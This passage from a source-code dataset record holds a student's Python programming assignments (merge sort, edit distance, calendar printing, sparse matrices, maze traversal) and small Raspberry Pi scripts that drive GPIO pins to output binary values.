2:11, 1:9, 0:10}\n\n\ndef decToBinList(decNumber):\n    s = []\n    while decNumber > 0:\n        s.append(decNumber % 2)\n        decNumber //= 2\n    while len(s) < 8:\n        s.append(0)\n    a = []\n    for i in range(len(s) - 1, -1, -1):\n        a.append(s[i])\n    return s\n\ndef num2dec(value):\n    k = decToBinList(value)\n    for i in range(8):\n        if k[i] == 1:\n            GPIO.output(numbers[i],1)\n\nprint('Enter the number of repetitions')\n\n\ntry:\n    def scr(t):\n        for i in range(t):\n            for j in range(256):\n                GPIO.output(chan_list,0)\n                num2dec(j)\n                time.sleep(0.01)\n            for k in range(255,-1,-1):\n                GPIO.output(chan_list,0)\n                num2dec(k)\n                time.sleep(0.01)\n    t = int(input())\n    scr(t)\nexcept Exception:\n    print('Error')\n\nfinally:\n    GPIO.output(chan_list,0)\n\n\nGPIO.cleanup()\n\n\n" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.5088702440261841, "avg_line_length": 21.87755012512207, "blob_id": "e4905df2ab6e172aab40b5f0e271534bdb68ad58", "content_id": "3c28098af0eb763af6b6a004e4df3a02f7314773bbfba3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1071, "license_type": "no_license", "max_line_length": 87, "num_lines": 49, "path": "/12_04_sc2.py", "repo_name": "Axalexan/raspberrypi", "src_encoding": "UTF-8", "text": "import RPi.GPIO as GPIO\nimport time\nchan_list = [26, 19, 13, 6, 5, 11, 9, 10, 17]\nchan_list1 = [26, 19, 13, 6, 5, 11, 9, 10]\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(chan_list, GPIO.OUT)\nGPIO.setup(4, GPIO.IN)\n\n\nnumbers={7:26, 6:19, 5:13, 4:6, 3:5, 2:11, 1:9, 0:10}\n\nGPIO.output(17, 
1)\n\n\ndef decToBinList(decNumber):\n s = []\n while decNumber > 0:\n s.append(decNumber % 2)\n decNumber //= 2\n while len(s) < 8:\n s.append(0)\n a = []\n for i in range(len(s) - 1, -1, -1):\n a.append(s[i])\n return s\n\ndef num2dec(value):\n k = decToBinList(value)\n for i in range(8):\n if k[i] == 1:\n GPIO.output(numbers[i],1)\n else:\n GPIO.output(numbers[i],0)\n\ntry:\n GPIO.setwarnings(False)\n k=-1\n while True:\n #if GPIO.input(4)==0:\n for i in range(256):\n num2dec(i)\n time.sleep(0.001)\n if GPIO.input(4) == 0:\n print('Digital value ',i, ', Analog value:', round(3.3*(i/255),1), 'V')\n break\n \n\nfinally:\n GPIO.cleanup()" }, { "alpha_fraction": 0.4935622215270996, "alphanum_fraction": 0.6523604989051819, "avg_line_length": 20.272727966308594, "blob_id": "b7fc5b338994178874883c32e553c0ad896d20bb", "content_id": "300cbe1fa346126637716af8cdd40e26a95729c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 233, "license_type": "no_license", "max_line_length": 53, "num_lines": 11, "path": "/2script.py", "repo_name": "Axalexan/raspberrypi", "src_encoding": "UTF-8", "text": "import RPi.GPIO as GPIO\nimport time\nchan_list = [26, 19, 13, 6, 5, 11, 9, 10, 17]\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(chan_list, GPIO.OUT)\n\n\nnumbers={7:26, 6:19, 5:13, 4:6, 3:5, 2:11, 1:9, 0:10}\nGPIO.output(chan_list,0)\n\nGPIO.cleanup()" }, { "alpha_fraction": 0.5523648858070374, "alphanum_fraction": 0.5906531810760498, "avg_line_length": 19.390804290771484, "blob_id": "6855e11bb4be95fa56c05886627b8c9746994591", "content_id": "609e9341d7974d4598e1182829c88f43e731db7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1776, "license_type": "no_license", "max_line_length": 54, "num_lines": 87, "path": "/TEST.py", "repo_name": "Axalexan/raspberrypi", "src_encoding": "UTF-8", "text": "import RPi.GPIO as GPIO\nGPIO.cleanup()\nimport time\nchan_list = [21, 20, 16, 12, 7, 8, 25, 24]\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(chan_list, GPIO.OUT)\n\n\nnumbers={7:21, 6:20, 5:16, 4:12, 3:7, 2:8, 1:25, 0:24}\n\n\ndef lightup(ledNumber, period):\n GPIO.output(numbers[ledNumber],1)\n time.sleep(period)\n GPIO.output(numbers[ledNumber],0)\n\n\ndef lightdown(ledNumber, period):\n GPIO.output(numbers[ledNumber],0)\n time.sleep(period)\n GPIO.output(numbers[ledNumber],1)\n\n\ndef blink(ledNumber, blinkCount, BlinkPeriod):\n for i in range(0,blinkCount):\n lightup(ledNumber, BlinkPeriod)\n lightdown(ledNumber, BlinkPeriod)\n\n\ndef runningLight(count, period):\n for i in range(count):\n for j in range(8):\n lightup(j, period)\n\n\ndef runningDark(count, period):\n GPIO.output(chan_list,1)\n for i in range(count):\n for j in range(8):\n lightdown(j, period)\n else:\n GPIO.output(chan_list,0)\n\n\ndef decToBinList(decNumber):\n s = []\n while decNumber > 0:\n s.append(decNumber % 2)\n decNumber //= 2\n while len(s) < 8:\n s.append(0)\n a = []\n for i in range(len(s) - 1, -1, -1):\n a.append(s[i])\n return s\n\n\ndef lightNumber(number):\n s = decToBinList(number)\n for i in range(7,-1,-1):\n GPIO.output(numbers[i],s[i])\n else:\n time.sleep(1)\n\n\ndef light2(s):\n for i in range(7,-1,-1):\n GPIO.output(numbers[i],s[i]) \n\n\ndef runningPattern(pattern , direction):\n s = decToBinList(pattern)\n p = pattern\n while True:\n pattern = p\n for i in range(8):\n time.sleep(0.5)\n GPIO.output(chan_list,0)\n lightNumber(pattern)\n pattern = pattern << 1\n \n\n\nrunningPattern(2, 1)\n\n\nGPIO.cleanup()\n\n\n" } ]
5
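Four of the five Raspberry Pi scripts in the record above (12_04_sc1.py, kek.py, 12_04_sc2.py, TEST.py) drive an 8-bit DAC on BCM pins and share the same decToBinList helper. That helper assembles a reversed copy `a` of the bit list but then returns the LSB-first list `s`, so `a` is dead code; num2dec relies on the LSB-first order, since its `numbers` dict maps bit index 0 to the pin for the least-significant bit. A minimal sketch of the same conversion without the dead code — plain Python 3, no RPi.GPIO needed; the 3.3 V scaling mirrors the print statements in the scripts:

def dec_to_bin_list(value, width=8):
    # Same contract as decToBinList above: bits of `value`,
    # least-significant bit first, `width` bits (inputs are 0-255 here).
    return [(value >> i) & 1 for i in range(width)]

# Behaviour checks against the loop-based original.
assert dec_to_bin_list(0) == [0, 0, 0, 0, 0, 0, 0, 0]
assert dec_to_bin_list(1) == [1, 0, 0, 0, 0, 0, 0, 0]
assert dec_to_bin_list(255) == [1] * 8

# The scripts report the analog equivalent of an 8-bit code like so:
for code in (0, 128, 255):
    print(code, '=', round(3.3 * (code / 255.0), 2), 'V')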
raduleo19/Machine-Learning
https://github.com/raduleo19/Machine-Learning
72d00237315a520ef86ae1d4aae9fdc532010afb
96477f4f11aafef218fdd6bea9e5741ce065d4ad
d8cca8a06772170f9f21ec35249a6a18bd781d32
refs/heads/master
2022-04-22T16:48:25.793302
2020-04-22T00:03:37
2020-04-22T00:03:37
248,806,840
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6165870428085327, "alphanum_fraction": 0.6426400542259216, "avg_line_length": 27.33757972717285, "blob_id": "be537307ea37c424e62d5a4431fb94826e686183", "content_id": "63141a8b09258632be7daa5194bbe3dd8b0dbec6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4606, "license_type": "no_license", "max_line_length": 83, "num_lines": 157, "path": "/Organ Segmentation/organ_segmentation.py", "repo_name": "raduleo19/Machine-Learning", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport sys\r\nimport imutils\r\nimport skimage.segmentation as seg\r\nfrom sklearn.preprocessing import minmax_scale\r\nfrom skimage import io, img_as_float32, img_as_float, img_as_ubyte\r\nfrom skimage.color import label2rgb\r\nfrom skimage.restoration import denoise_nl_means, estimate_sigma\r\nfrom skimage.filters import gaussian\r\nfrom collections import Counter\r\n\r\ndef get_first_unvisited(matrix, visited, color):\r\n rows = matrix.shape[0]\r\n cols = matrix.shape[1]\r\n\r\n for i in range(rows):\r\n for j in range(cols):\r\n if (matrix[i][j] == color) and (visited[i][j] == 0):\r\n return i, j\r\n\r\n return -1, -1\r\n\r\n# Read image and reference\r\noriginal_image = np.loadtxt(sys.argv[1])\r\nmask = np.loadtxt(sys.argv[2])\r\n\r\n# Scale\r\ncenter = (original_image.min() + original_image.max()) / 2\r\noriginal_image -= center\r\noriginal_image /= abs(original_image.min())\r\noriginal_image = img_as_ubyte(original_image)\r\n\r\nplt.subplot(2, 4, 1)\r\nplt.title(\"Before Preprocesing\")\r\nplt.imshow(original_image, cmap=\"gray\")\r\n\r\n# Preprocessing\r\n\r\n# Enhance image\r\nenhanced_image = cv2.equalizeHist(original_image)\r\n\r\n# Smooth image\r\nsmoothed_image = cv2.medianBlur(enhanced_image, 3)\r\n\r\n# Denoise\r\ndenoised_image = cv2.fastNlMeansDenoising(\r\n src=smoothed_image, dst=None, h=17, templateWindowSize=14, searchWindowSize=25)\r\n\r\n# Show after preprocessing\r\nplt.subplot(2, 4, 2)\r\nplt.title(\"After Preprocesing\")\r\nplt.imshow(denoised_image, cmap=\"gray\")\r\n\r\n# Segment by Color With K-Means\r\nvectorized_image = denoised_image.reshape((-1, 1))\r\nvectorized_image = img_as_float32(vectorized_image)\r\n\r\nK = 10\r\nsegmentation_found = 0\r\n\r\nwhile segmentation_found != 1:\r\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\r\n ret, label, center = cv2.kmeans(\r\n vectorized_image, K, None, criteria, 70, cv2.KMEANS_PP_CENTERS)\r\n\r\n center = img_as_ubyte(center)\r\n res = center[label.flatten()]\r\n segmented_image = res.reshape((denoised_image.shape))\r\n segmented_image = img_as_ubyte(segmented_image)\r\n\r\n # Extract our segment\r\n intersection = cv2.bitwise_or(\r\n segmented_image, segmented_image, mask=img_as_ubyte(mask))\r\n plt.subplot(2, 4, 6)\r\n plt.title(\"Intersection\")\r\n plt.imshow(intersection)\r\n\r\n # Extract our dominant color\r\n non_black_pixels = np.array(intersection).flat\r\n non_black_pixels = non_black_pixels[non_black_pixels != 0]\r\n bincount = np.bincount(non_black_pixels)\r\n dominant_color = bincount.argmax()\r\n total_pixels = np.sum(mask[mask > 0])\r\n print(dominant_color)\r\n print(total_pixels)\r\n\r\n # Extract the organ\r\n body_part = np.zeros((segmented_image.shape), np.uint8)\r\n start_x, start_y = get_first_unvisited(\r\n intersection, body_part, dominant_color)\r\n print(start_x, start_y)\r\n\r\n selected_pixels = 0\r\n stack = []\r\n stack.append((start_x, start_y))\r\n 
while stack:\r\n x, y = stack.pop()\r\n if segmented_image[x][y] == dominant_color:\r\n if body_part[x, y] == 0:\r\n selected_pixels += 1\r\n body_part[x, y] = 255\r\n if x > 0:\r\n stack.append((x - 1, y))\r\n if x < 511:\r\n stack.append((x + 1, y))\r\n if y > 0:\r\n stack.append((x, y - 1))\r\n if y < 511:\r\n stack.append((x, y + 1))\r\n\r\n if selected_pixels * 100 > 56 * total_pixels:\r\n segmentation_found = 1\r\n K -= 1\r\n\r\nplt.subplot(2, 4, 3)\r\nplt.title(\"K-Means Color Segmentation - RGB View\")\r\nplt.imshow(label2rgb(segmented_image))\r\n\r\nplt.subplot(2, 4, 4)\r\nplt.title(\"K-Means Color Segmentation - Grayscale View\")\r\nplt.imshow(segmented_image)\r\n\r\nplt.subplot(2, 4, 5)\r\nplt.title(\"Mask\")\r\nplt.imshow(mask)\r\n\r\nplt.subplot(2, 4, 7)\r\nplt.title(\"Result\")\r\nplt.imshow(body_part, cmap=\"gray\")\r\n\r\n# Postprocessing\r\n\r\n# Enhance image\r\nenhanced_image = cv2.equalizeHist(body_part)\r\n\r\n# Smooth image\r\nsmoothed_image = cv2.GaussianBlur(enhanced_image, (5, 5), 2)\r\n\r\n# Denoise\r\ndenoised_image = cv2.fastNlMeansDenoising(\r\n src=smoothed_image, dst=None, h=10, templateWindowSize=9, searchWindowSize=23)\r\n\r\n# Dilated\r\ndilated_image = cv2.dilate(denoised_image, (3, 3),iterations = 5)\r\n\r\n# Threshold Filter\r\nthresh_image = cv2.threshold(dilated_image, 180, 255, cv2.THRESH_BINARY)[1]\r\nthresh_image[thresh_image > 0] = 1\r\nnp.savetxt(\"optim.out\", thresh_image)\r\n\r\nplt.subplot(2, 4, 8)\r\nplt.title(\"After Postprocessing - FINAL\")\r\nplt.imshow(img_as_ubyte(thresh_image))\r\n\r\nplt.show()\r\n" }, { "alpha_fraction": 0.824999988079071, "alphanum_fraction": 0.824999988079071, "avg_line_length": 12.333333015441895, "blob_id": "afda24323cbe1f64114dc67abe2153eb4d124d28", "content_id": "ccd1bbc5cedb57b10da22c8cdd8a1f0b1c3eaf51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 40, "license_type": "no_license", "max_line_length": 19, "num_lines": 3, "path": "/README.md", "repo_name": "raduleo19/Machine-Learning", "src_encoding": "UTF-8", "text": "# Machine-Learning\n\nVarious experiments\n" } ]
2
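organ_segmentation.py above centres on cv2.kmeans colour quantisation: the scan is flattened to an N x 1 float32 vector, clustered into K grey levels, each pixel is replaced by its cluster centre, and the script then lowers K until the flood-filled region covers enough of the mask. A minimal sketch of just the quantisation step, using the same criteria and KMEANS_PP_CENTERS flag (fewer attempts than the script's 70; `img` stands for any single-channel uint8 image):

import numpy as np
import cv2

def quantize_gray(img, K=10, attempts=10):
    # Flatten to one float32 sample per pixel, as the script does.
    data = img.reshape((-1, 1)).astype(np.float32)
    criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
    _, labels, centers = cv2.kmeans(data, K, None, criteria, attempts,
                                    cv2.KMEANS_PP_CENTERS)
    # Map every pixel back to its cluster centre (K distinct grey levels).
    centers = centers.astype(np.uint8)
    return centers[labels.flatten()].reshape(img.shape)

# Usage: quantized = quantize_gray(cv2.imread('scan.png', cv2.IMREAD_GRAYSCALE))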
bboalimoe/D_Server
https://github.com/bboalimoe/D_Server
10ea044acef478496f5ebc13634b33c8e36124d7
2c83021fad11e72c1fa526bddafada59281d398d
d626b006124e443acd22b0e35f7203442ca9cc67
refs/heads/master
2021-01-23T05:57:00.999662
2017-06-12T09:03:57
2017-06-12T09:03:57
93,005,743
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5564085245132446, "alphanum_fraction": 0.5851134657859802, "avg_line_length": 30.87234115600586, "blob_id": "537dcd498fe260706d1baf192d82a838172f7cc0", "content_id": "ec053330c2b098ce2dbb6e10a3ab2ff1f9d3e88a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2996, "license_type": "permissive", "max_line_length": 129, "num_lines": 94, "path": "/server.py", "repo_name": "bboalimoe/D_Server", "src_encoding": "UTF-8", "text": "__author__ = 'zhanghengyang'\nfrom flask import Flask\nimport os\nimport json\nfrom flask import request\nimport uuid\nimport numpy as np\nimport cv2\nimport json\nimport _process_image as pi\n#from _process_image import CRect, Cvec4i\nimport time\nimport random\nimport string\n#from preprocessing import proc\nfrom licenseRec import process\n\n\ndef proc(res):\n \n return res\n\ndef fname():\n\n return str(int(time.time())) + '_' + ''.join(random.choice(string.uppercase+string.digits) for _ in range(20))\n\n\napp = Flask(__name__)\n\npath = '/home/advanpro/photos'\ntemp_path = '/home/ubuntu/ocr/VLRecognitionSuiteServerSO/Debug/temp.jpg'\n\[email protected]('/upload', methods=['POST'])\ndef upload():\n if request.method == 'GET':\n return \"no GET method supported\"\n\n if request.method == 'POST':\n file = request.files['filename']\n _headers = request.headers\n print _headers\n print type(_headers)\n if type(_headers) != 'NoneType':\n ClicenseRect = json.loads( _headers.get('ClicenseRect', \"[0,0,0,0]\"))\n CstampRect = json.loads(_headers.get('CstampRect', \"[0,0,0,0]\"))\n CenginLine = json.loads(_headers.get('CenginLine', \"[0,0,0,0]\"))\n CvinLine = json.loads(_headers.get('CvinLine', \"[0,0,0,0]\"))\n r1 = (ClicenseRect[0], ClicenseRect[1], ClicenseRect[2], ClicenseRect[3])\n r2 = (CstampRect[0], CstampRect[1], CstampRect[2], CstampRect[3])\n v1 = (CenginLine[0], CenginLine[1], CenginLine[2], CenginLine[3] )\n v2 = (CvinLine[0], CvinLine[1], CvinLine[2], CvinLine[3])\n #print type(file)\n #data = request.data\n #rstream = file.stream.read()\n #barray = np.asarray(bytearray(rstream))\n #img = cv2.imdecode(barray,1)\n #print \"file info\",file\n f_name = path + fname()\n file.save(f_name)\n# print \"f_name\", f_name\n# print r1\n# \tprint r2\n#\tprint v1\n#\tprint v2\n#\tf_name2 = path + \"btest.jpg\"\n# res2 = pi.process_image(f_name2, r1, r2, v1, v2) \n#\tprint json.dumps(res2)\n #res = pi.process_image(f_name, r1, r2, v1, v2)\n\n #img_path = \"/home/advanpro/OCR-CORE/raw_image/license-train/test_new.jpg\"\n status, info = process(img_path)\n print type(info), info\n for (k,v) in info.items():\n print(k+':'+v.encode('utf-8'))\n\n # if res['flag'] != 6 and res['flag'] != 5:\n # if os.path.exists(f_name):\n # os.remove(f_name)\n # else:\n # print 'no such file:%s' % f_name\n # file.flush()\n print \"=========start=======\"\n print \"=========end=========\"\n #res = proc()\n return json.dumps(info).encode('utf8')\n\n\nif __name__ == \"__main__\":\n print \"start server!!!\"\n# zeros = (0, 0, 0, 0)\n# pi.process_image(\"~/ocr/VLRecognitionSuiteServerSO/Debug/photos/1483845738_ZGBINXQ9DXLLJZOS6LYV\",zeros, zeros, zeros, zeros)\n app.debug = True\n app.run(host=\"0.0.0.0\",port=8080)\n print \"stop server!!!\"\n" }, { "alpha_fraction": 0.4910583794116974, "alphanum_fraction": 0.5257299542427063, "avg_line_length": 43.17741775512695, "blob_id": "ae90826ed73adf1b3d7157ad54631d78123ac40b", "content_id": "a6d91dce55231fc55e9e1f9b089defd77cc46cfa", "detected_licenses": [ "MIT" ], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10990, "license_type": "permissive", "max_line_length": 101, "num_lines": 248, "path": "/licenseRect.py", "repo_name": "bboalimoe/D_Server", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#coding:utf-8\n\nimport numpy as np\nimport os\nimport cv2\nimport sys\nimport shutil\nimport codecs\n\nimport configPath\nfrom args import args\n\nfrom other import draw_boxes\nfrom text_dtc.textDetectionCTPN import textDetection\nfrom char_seg.CharSegmentation import CharSegmentation\nfrom char_reg.TextRecognition import TextRecognition\nfrom char_reg.BuildDictionary import buildDictionary\nfrom text_item.arrangeItems import arrangeItems\n#\n# textline detector\ntext_detector = textDetection(configPath.ROOT_PATH, args.gpu_cpu, args.gpu_no, \\\n args.license_size[0], args.license_size[1])\n# character segmentor\nseg_model = configPath.ROOT_PATH + args.model_set_dir + args.char_seg_model\nchar_segmentor = CharSegmentation(args.textline_height, args.textline_width,\\\n seg_model, args.gpu_cpu, args.gpu_no)\n# text recognizer\ntext_recognizer = TextRecognition(configPath.ROOT_PATH, args)\n# dic\nchn_file_path = configPath.ROOT_PATH + args.model_set_dir + args.char_chn_code\neng_file_path = configPath.ROOT_PATH + args.model_set_dir + args.char_eng_code\nchar2code, code2char = buildDictionary(chn_file_path, eng_file_path)\n# aggrange items\nitemizer = arrangeItems(args, configPath)\n# debug flag\ndebug = True\n# parameters\ntextline_std_height = 65\ntextline_extend = 20\n\"\"\"\nimage: image path, absolute path\nrect: license position (x0,y0, x1,y1)\nstatus: license version\n\"\"\"\ndef process(image=None, rect=None, status=None):\n # initialize\n ret_status = {'0':1.0,\\\n '1':0.0,'2':0.0,'3':0.0,'4':0.0,'5':0.0,\\\n '6':0.0,'7':1.0,'8':0.0,'9':0.0,'10':0.0,'11':0.0,\\\n '12':0.0,'13':0.0}\n ret_info = {'0':'中华人民共和国机动车行驶证'.decode('utf-8'),\\\n '1':'','2':'','3':'','4':'','5':'',\\\n '6':'','7':'印章'.decode('utf-8'),'8':'','9':'','10':'','11':''}\n # process\n if os.path.isfile(image):\n image_name = os.path.basename(image)\n # read image\n img = cv2.imread(image)\n if img is None:\n print('Image doese not exist!')\n ret_status['12'] = 0\n return ret_status, ret_info\n if rect is None:\n license = img\n else:\n license = img[int(rect[1]):int(rect[3]),int(rect[0]):int(rect[2])]\n # detect textline\n textlines, truelines, license = text_detector.detecText(license)\n if textlines is None or textlines.shape[0] == 0:\n print('Textline does not exist!')\n ret_status['12'] = 1\n return ret_status, ret_info\n if debug:\n im_with_text_lines = draw_boxes(license, textlines, is_display=False, \\\n caption='textline', wait=True)\n cv2.imwrite('./debug/license_detect/'+ image_name, im_with_text_lines)\n # tilt correct and textline crop, and resize\n textline_imges, textline_poses = [], []\n for i in xrange(textlines.shape[0]):\n textline_name = image_name[0:image_name.find('.')] + '_' + str(i) + '.png'\n textline = textlines[i,:]\n trueline = truelines[i,:]\n pts1 = np.float32([[trueline[0],trueline[1]],[trueline[3],trueline[4]],\\\n [trueline[0],trueline[2]],[trueline[3],trueline[5]]])\n pts2 = np.float32([[textline[0],textline[1]],[textline[2],textline[1]],\\\n [textline[0],textline[3]],[textline[2],textline[3]]])\n M = cv2.getPerspectiveTransform(pts1,pts2)\n dst = cv2.warpPerspective(license, M, (license.shape[1],license.shape[0]))\n textline[0] = max(0, textline[0]-textline_extend)\n textline[2] = 
min(textline[2]+textline_extend,license.shape[1])\n textline_img = dst[int(textline[1]):int(textline[3]),int(textline[0]):int(textline[2]),:]\n scale = (1.0*args.textline_height)/(1.0*textline_img.shape[0])\n textline_img = cv2.resize(textline_img, None, fx=scale, fy=scale)\n textline_imges.append(textline_img)\n textline_poses.append(textline)\n if debug:\n cv2.imwrite('./debug/textline_crop/'+textline_name, textline_img)\n # filter the uncorrect textlines\n for i in reversed(xrange(len(textline_poses))):\n if textline_poses[i][3]-textline_poses[i][1] > textline_std_height:\n del textline_imges[i]\n del textline_poses[i]\n rect_x0, rect_y0, rect_x1, rect_y1 = 0, 0, 0, 0\n for i in xrange(len(textline_poses)):\n if i == 0:\n rect_x0 = textline_poses[i][0]\n rect_y0 = textline_poses[i][1]\n rect_x1 = textline_poses[i][2]\n rect_y1 = textline_poses[i][3]\n continue\n if textline_poses[i][0] < rect_x0:\n rect_x0 = textline_poses[i][0]\n if textline_poses[i][1] < rect_y0:\n rect_y0 = textline_poses[i][1]\n if textline_poses[i][2] > rect_x1:\n rect_x1 = textline_poses[i][2]\n if textline_poses[i][3] > rect_y1:\n rect_y1 = textline_poses[i][3]\n if debug:\n license_image=license.copy()\n for i in xrange(len(textline_poses)):\n cv2.rectangle(license_image,(textline_poses[i][0],textline_poses[i][1]),\\\n (textline_poses[i][2],textline_poses[i][3]),(0,0,255))\n cv2.rectangle(license_image,(rect_x0,rect_y0),(rect_x1,rect_y1),(255,0,0))\n if len(textline_poses)>=8:\n step = (rect_y1-rect_y0)/8.0\n for i in xrange(8):\n cv2.rectangle(license_image,(int(rect_x0),int(rect_y0+step*i)),\\\n (int(rect_x1),int(rect_y0+step*(i+1))),(0,255,0))\n cv2.imwrite('./debug/textline_bbox/'+image_name,license_image)\n # recogntion\n textline_chars, textchar_probs, textchar_charnum, textchar_poses = [],[],[],[]\n for i in xrange(len(textline_imges)):\n textline_name = image_name[0:image_name.find('.')] + '_' + str(i) + '.png'\n bgr_img1 = textline_imges[i].copy()\n rgb_img = textline_imges[i].copy()\n rgb_img[:,:,0] = bgr_img1[:,:,2]\n rgb_img[:,:,1] = bgr_img1[:,:,1]\n rgb_img[:,:,2] = bgr_img1[:,:,0]\n # segmenation\n p1, p2, p3, p4, p5, p6 = char_segmentor.segment(rgb_img)\n p1_int = p1.astype(int)\n p2_int = p2.astype(int)\n p3_int = p3.astype(int)\n p4_int = p4.astype(int)\n p5_int = p5.astype(int)\n p6_int = p6.astype(int)\n if debug:\n bgr_img2 = bgr_img1.copy()\n for j in xrange(p1_int.shape[0]):\n cv2.rectangle(bgr_img2,(p1_int[j,0],p1_int[j,2]),\\\n (p1_int[j,1],p1_int[j,3]),(0,0,255))\n cv2.imwrite('./debug/textline_seg1/'+textline_name,bgr_img2)\n if debug:\n bgr_img3 = bgr_img1.copy()\n for j in xrange(p4_int.shape[0]):\n cv2.rectangle(bgr_img3,(p4_int[j,0],p4_int[j,2]),\\\n (p4_int[j,1],p4_int[j,3]),(0,255,0))\n cv2.imwrite('./debug/textline_seg2/'+textline_name,bgr_img3)\n # recognition\n chars, probs, charnum, poses = text_recognizer.\\\n recogtext(bgr_img1, p1_int, p2_int, p3_int, p4_int, p5_int, p6_int)\n if debug:\n pre_str = ''\n bgr_img4 = bgr_img1.copy()\n for k in xrange(chars.shape[0]):\n pre_char = code2char[str(int(chars[k,0]))].encode('utf-8')\n if charnum[k] == 1:\n color = (0,0,255)\n elif charnum[k] == 2:\n color = (0,255,0)\n elif charnum[k] == 3:\n color = (255,0,0)\n elif charnum[k] == 4:\n color = (0,255,255)\n elif charnum[k] == 5:\n color = (255,0,255)\n elif charnum[k] == 6:\n color = (255, 255, 0)\n cv2.rectangle(bgr_img4,(poses[k,0],poses[k,2]),(poses[k,1],poses[k,3]),color)\n pre_str = pre_str+pre_char\n 
cv2.imwrite('./debug/textline_rec/'+textline_name[0:textline_name.find('.')]\\\n +'_'+pre_str+'.png',bgr_img4)\n # \n textline_chars.append(chars)\n textchar_probs.append(probs)\n textchar_charnum.append(charnum)\n textchar_poses.append(poses)\n # todo: consider use a language model to finetune the text\n textline_text = []\n for i in xrange(len(textline_chars)):\n text = ''\n for j in xrange(textline_chars[i].shape[0]):\n text = text + code2char[str(int(textline_chars[i][j,0]))]\n #print text\n textline_text.append(text)\n # arrange item using heuristic rules\n ret_status, ret_info = itemizer.arrange(textline_poses, textline_text, textline_chars,\\\n textchar_poses, code2char, ret_status, ret_info,\\\n (rect_x0,rect_y0,rect_x1,rect_y1))\n\n else:\n print('Image file does not exist!')\n ret_status['12'] = 0\n count = 0\n for (k,v) in ret_info.items():\n if v != '':\n ret_status[k] = 1.0\n count += 1\n ret_status['13'] = count\n if debug:\n log_file = codecs.open('./debug/log.txt','a','utf-8')\n log_file.write(image+'\\n')\n for (k,v) in ret_info.items():\n string = k+':'+v+'\\n'\n #print(string)\n log_file.write(string)\n log_file.close()\n return ret_status, ret_info\n\nif __name__ == '__main__':\n if debug:\n shutil.rmtree('./debug')\n os.makedirs('./debug/license_detect')\n os.makedirs('./debug/textline_bbox')\n os.makedirs('./debug/textline_crop')\n os.makedirs('./debug/textline_rec')\n os.makedirs('./debug/textline_seg1')\n os.makedirs('./debug/textline_seg2')\n \n img_dir = configPath.ROOT_PATH + args.raw_image_dir + args.license_image_train\n textline_dir = configPath.ROOT_PATH + args.raw_image_dir + args.textline_image_train\n demo_imnames = os.listdir(img_dir)\n \n count = 0\n for img_name in demo_imnames:\n count = count + 1\n if count < 10000:\n continue\n if count == 10050:\n break\n print('count:'+str(count)+' '+img_name)\n img_path = img_dir + '/' + img_name\n print(\"img path\"+\" \" + img_path )\n status, info = process(img_path)\n for (k,v) in info.items():\n print(k+':'+v.encode('utf-8'))\n \n \n" } ]
2
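server.py in the record above is Python 2 Flask code: it receives a multipart upload under the field name 'filename', saves it as <timestamp>_<random suffix>, and hands the path to the vehicle-licence OCR process(). A Python 3 sketch of that upload flow with the OCR stubbed out — recognize() is a placeholder for the project's process(), and the upload directory is an assumption:

import json
import os
import time
import uuid
from flask import Flask, request

app = Flask(__name__)
UPLOAD_DIR = '/tmp/photos'  # assumption; the server above uses /home/advanpro/photos

def recognize(path):
    # Placeholder for licenseRec.process(); returns a JSON-serialisable dict.
    return {'status': 'ok', 'file': os.path.basename(path)}

@app.route('/upload', methods=['POST'])
def upload():
    f = request.files['filename']  # same multipart field name the client uses
    os.makedirs(UPLOAD_DIR, exist_ok=True)
    dest = os.path.join(UPLOAD_DIR, '%d_%s' % (int(time.time()), uuid.uuid4().hex))
    f.save(dest)
    info = recognize(dest)
    return json.dumps(info), 200, {'Content-Type': 'application/json'}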
softagram/allrepos-utility
https://github.com/softagram/allrepos-utility
b3e82a46acdf7756d91d4c7d0138dcaa5cda0d14
be2a2f69ecd8e43aea473f8f62f4fb74fe874082
59fa21895c23c5de94dc4e1bb921416652c3dca2
refs/heads/main
2023-07-12T08:02:13.063690
2021-08-19T14:55:23
2021-08-19T14:55:23
330,932,624
0
1
MIT
2021-01-19T09:48:01
2021-01-19T09:50:42
2021-08-19T14:55:23
Python
[ { "alpha_fraction": 0.5470588207244873, "alphanum_fraction": 0.5509803891181946, "avg_line_length": 25.842105865478516, "blob_id": "4baf94d7b697faac8172e5e34d74d4f96759bf41", "content_id": "0166a2abefb8af101435b333a16e18cbd014be46", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 510, "license_type": "permissive", "max_line_length": 64, "num_lines": 19, "path": "/allrepos.py", "repo_name": "softagram/allrepos-utility", "src_encoding": "UTF-8", "text": "# See README.md for documentation.\n\nimport sys\nimport os\n\nargs = sys.argv[1:]\next_slot = ''\next_args = []\nif 'IF_OK_EXECUTE_ALSO' in args:\n pos = args.index('IF_OK_EXECUTE_ALSO')\n ext_args = args[pos + 1:]\n args = args[:pos]\n\nfor fn in os.listdir('.'):\n if os.path.isdir(fn) and os.path.exists(fn + '/.git'):\n main_cmd = f'echo {fn} && git -C {fn} ' + ' '.join(args)\n if ext_args:\n ext_slot = f' && git -C {fn} ' + ' '.join(ext_args)\n os.system(main_cmd + ext_slot)\n" }, { "alpha_fraction": 0.7428139448165894, "alphanum_fraction": 0.7503781914710999, "avg_line_length": 29.045454025268555, "blob_id": 